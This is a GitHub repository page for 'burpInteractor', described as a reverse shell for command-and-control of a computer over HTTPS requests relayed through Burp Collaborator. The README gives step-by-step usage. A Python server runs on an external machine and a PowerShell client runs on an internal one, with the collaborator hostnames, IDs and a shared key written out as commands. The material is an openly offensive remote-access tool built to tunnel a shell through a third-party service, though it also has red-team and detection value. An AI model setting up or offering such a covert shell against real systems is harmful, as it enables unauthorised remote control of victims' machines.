Skip to content

A reverse shell to C2 a computer by sending HTTPS requests to Burp Collaborator

Notifications You must be signed in to change notification settings

t0-n1/burpInteractor

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 

Repository files navigation

Burp Interactor

Usage

  1. Open Burp Suite Professional.
  2. Open Burp Collaborator Client tool.
  3. Get a <BURPCOLLABORATOR-HOSTNAME-1> and URL decoded <BIID-1> for external to internal communication.
  4. Get a <BURPCOLLABORATOR-HOSTNAME-2> and URL decoded <BIID-2> for internal to external communication.
  5. Execute the python server script on the external computer.
(external computer) sh > python3 bi-server.py <BURPCOLLABORATOR-HOSTNAME-1> <BIID-2> S3cr3tK3y
  1. Execute the client powershell script on the internal computer.
(internal computer) PS > .\bi-client.ps1 <BURPCOLLABORATOR-HOSTNAME-2> <BIID-1> S3cr3tK3y
(internal computer) PS > .\bi-client.ps1 <BURPCOLLABORATOR-HOSTNAME-2> <BIID-1>
Enter Key: S3cr3tK3y

About

A reverse shell to C2 a computer by sending HTTPS requests to Burp Collaborator

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published